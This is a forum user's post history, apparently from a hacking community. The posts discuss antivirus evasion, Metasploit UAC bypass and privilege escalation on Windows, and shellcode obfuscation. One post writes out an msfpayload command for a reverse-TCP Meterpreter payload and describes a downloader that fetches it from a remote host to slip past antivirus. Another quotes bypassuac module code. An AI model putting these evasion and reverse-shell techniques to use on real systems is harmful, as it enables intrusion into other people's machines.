bobbyb1980
Everything posted by bobbyb1980

  1. This is what that Facebook guy did recently to get around paying taxes. Hopefully he took into consideration that when he tries to attend the board meeting in LA or NYC with his new passport, Customs is rightfully going to say "LOL NO THX BYE".
  2. Don't do web design, but I do enjoy downloading various payloads through the different browsers to see which built-in antiviruses detect what. Surprisingly, from what little testing I've done, Internet Explorer catches more payloads than Firefox and Chrome. Firefox has pretty horrible built-in virus detection (doesn't even pick up compiled msf shellcode), and I found that Chrome was mediocre and had similar detection rates to ESET.
  3. My first language was Python and I thought it was great. What I like most about it is that it's object oriented, has a very easy to read syntax, and it has a lot of real world applications.
  4. Digip, come here man, give me a hug : ) I know you're just trying to help and that is GREATLY appreciated. I'm like you and have the tendency to think in a million different directions, sometimes I even have problems verbalizing what I think. I apologize for my prior attitude, I was just frustrated with your well-intentioned advice. I've been studying a lot of C++ lately and it's turned me into an uptight prick, I realize this when my wife and people on internet forums say the same thing about me :P But either way, I was wrong, we are both hackers and strive for the same thing and should always be mutually respectful of each other. I believe you are still under the impression that I still don't have it working - it's working for me, I just had to do things in a custom way. To my understanding, the SET payload is executing a .bin from within another executable, which is what I ended up doing to get it working. To my understanding (which could very well be wrong), the inherent exploit (certificate) is still vulnerable, but like always the AV gets in the way of things (depending what AV you're using). So possibly for someone using a weak AV like ESET it could work fine, but if they're using Kaspersky it could be problematic.
  5. And for the record, even with the SET payload - it's being written to disk. I actually used a very similar approach to get around the antivirus, which was writing a C++ program that downloads the meterpreter binary (the output of ./msfpayload windows/meterpreter/reverse_tcp LHOST=... LPORT=... R > payload.bin and encoded in a particular way which I'm not going to post here) which currently the AVs do not pick up, and runs it from the .exe. If you want to know more - www.kokoromi.org/wp-content/themes/kokoromi/body.htmlcont. The .exe downloads it from a remote host and when it's written to disk, because it's a .bin that excludes those null bytes the AV is looking for, AV isn't picking it up. The SET payload appears to be doing something very similar (executing a binary obtained from the internet from within another executable), hence evading the AV. Either way, during both procedures data is being written to disk.
  6. If I'm a dick - it's because I don't like taking bogus advice ; P Since "His payloads and shell code all run in memory."... and "they never touch disk and run from memory, which is also why his stuff evades 99% of all anti-virus."... then what is the following code about, taken from bypassuac.rb... print_status("Uploading the bypass UAC executable to the filesystem...") .... # Upload the payload to the filesystem # tempexe = tmpdir + "\\" + tempexe_name fd = client.fs.file.new(tempexe, "wb") fd.write(exe) fd.close rescue ::Exception => e print_error("Error uploading file #(unknown): #{e.class} #{e}") return ... ... # delete the uac bypass payload delete_file = "cmd.exe /c del #{tmpdir}\\#(unknown)" That looks like something is being written to the disk to me... P.S. - bypassuac isn't only Kennedy, it's Mitnick's work also.
  7. I was in a class a few months ago with a guy who worked in a hospital and he told me the last guy had been fired because their data was breached. I'd put data security before other conveniences, HIPAA is no joke.
  8. I never get tired of hacker cat : ) http://http://cheezburger.com/4452786432
  9. I wonder how difficult this would be to create in C++ or Python? Maybe some of the more experienced coders can chime in, but all we're doing is reading stdout, and inputting values via stdin to the "user" and "password" parameters, right? Then one could code an if statement inside of an iteration that reads stdout and says something like "if stdout == 'access denied', continue trying, else return (user & pass)"?? That's my vague idea, but something like that? I wouldn't know where to start, but I'd be happy to give it a shot with a little help and we could create a hak5 doc/docx password cracker : )
  10. Get the IP(s) of the attacker(s), add them to /etc/hosts.deny, or if you're using APF you could do "apf -d 207.96.146.43"? Should probably deny traffic from offending IPs at the router via the same methods, depending on the firmware. Check the logs for whichever service is being DDoS'd to get the offending IP.
  11. I got it working with my own custom payload. bypassuac is no "special shellcode" nor does it "run in memory". I don't know where you got that from. It's a regular meterpreter payload and the only obfuscation the script runs is randomizing the binary name, which is why it triggers antivirus and why it doesn't work anymore. Lol... I thought the internet was run by hamsters or whatever you said in the other thread : P
  12. bypassuac writes to the disk...
  13. bypassuac is a good module and with some tweaking it can work, however it won't work right out of the box. You can upload your own payload, and depending on certain variables in your environment it may/may not work. I was able to get it to work, but after a lot of customization. By default Windows Defender and/or MS Security Essentials knows that payload very well. Windows 7 seems to put in place an Ubuntu sudo-style priv system which is a lot more secure than what XP uses. Even if you migrate to a system process from a limited user account, you can drop into a shell at C:\...System32 but you won't have system privs, so I'm not exactly sure how you'd be getting them digi, you must have to be starting from an admin account. I don't really use SET that much anymore but I'll check out this hexdump... can you be a little more specific about what attack vector you're talking about though? I also found another way to escalate from limited user to admin by using cygwin, but it's very non-practical and cygwin needs to be set up in a very specific way which probably doesn't exist outside my setup, possible though!
  14. How would you do it for 32 bit?
  15. In order to read the hashes you need SYSTEM privs. Yeah digi, all that script does is open a shell with whatever the current user's privs are. Windows 7 is starting to look like a halfway secure OS!
  16. The problem I had the other day was with XP. In Windows 7 you can migrate to a system process from a limited account but it won't give you sys privs like in XP. I tried running that .bat, but in Windows 7 SP1 you can't run files as admin without an admin password. A shell pops up but nothing happens. That script works for you in Win 7 SP1 to go from a limited user acct to admin/system?
  17. You might find this interesting if you haven't seen it already. It's a talk on binary obfuscation from Defcon that covers this topic intimately.
  18. Just fired up a VM of a Windows 7 SP1 fully patched machine and see that it is no longer vulnerable to admin/system level escalation attacks from a limited user account? Tried getsystem and get an access denied error, bypassuac no longer works, any ideas? Windows wins?
  19. Well, just for the record, I can evade anti-virus successfully w/java. As someone who does pentesting, not every machine in the wild has java installed, i.e. not every pentest is as easy as getting someone to click a link. Have to go custom here, not trying to take over the internet, just a pentest ; ) EDIT - probably shouldn't have pasted that here : ) I would love to get my hands on the book "The Elements of Computing Systems", can you recommend any online training courses that would perhaps serve the same purpose? As always, your responses are greatly appreciated.
  20. It'd be nice to be able to get a shell using only javascript...
  21. Thank you again for an insightful reply Sitwon. Why not? If I can just open a .exe in Immunity and see the assembly code in a few clicks, what's to stop an antivirus from doing the same? If I understand you correctly, is this where the antivirus would be searching for nops or /x in the shellcode? And how is the antivirus seeing the shellcode if it can't see the original C code? Can you recommend any ways to obfuscate the shellcode (which I assume must be done in the C code before compiling?) I'm starting to see that. I'm also starting to see the flip side of the coin in that no one payload is going to successfully evade all the major antivirus vendors. I'm having problems evading the same 5 or 6 antivirus vendors and they must be using the same technique, and based on experimentation I can conclude that UPX or any packing to do with metasploit will set them off. I can also conclude that there are 5 or 6 that appear to be able to see shellcode coming from a mile away, regardless of the type. I made shellcode to add a user and that was triggered. This leads me to believe it's somehow reading the assembly instructions? Any ideas for obfuscating that? Also the current shellcode I'm using (custom written oo : ) : ) :) has a lot of '/x' characters in it and I'm currently searching for a way to make it alphanumeric and compile that directly. I mean, the antivirus can't possibly be triggered by alphanumeric characters, if so then I'd imagine many typos would trigger AVs? Must try harder.
  22. OK but what do you mean scan files? If I have a .exe, is it scanning the "outside" of the .exe for certain types of packing? Or is it scanning the .asm file that was used to compile for certain behaviour? Or is it looking in the binary for certain characteristics? Or in the actual code written in C or whatever? Or searching through pasted in shellcode?
  23. I have shellcode written in a simple C program. Before that program is run and it is scanned by anti-virus, what exactly is happening? Is the antivirus listening at a firewall level for recently initiated outgoing traffic? I would imagine they aren't doing that... yet. Is the antivirus somehow scanning the original code? If so, what would it be looking for? To my understanding certain ones look for certain packers, like UPX, and deny any program with this packing?
  24. I'm using Virtualbox on Ubuntu and can confirm that it's crap software. Their USB functionality and shared folder functionality doesn't work.
  25. Looked it up and found Stuxnet on metasploit... don't think the CIA/Mossad is publishing their work on metasploit but I'm sure they'd love to take credit for it : P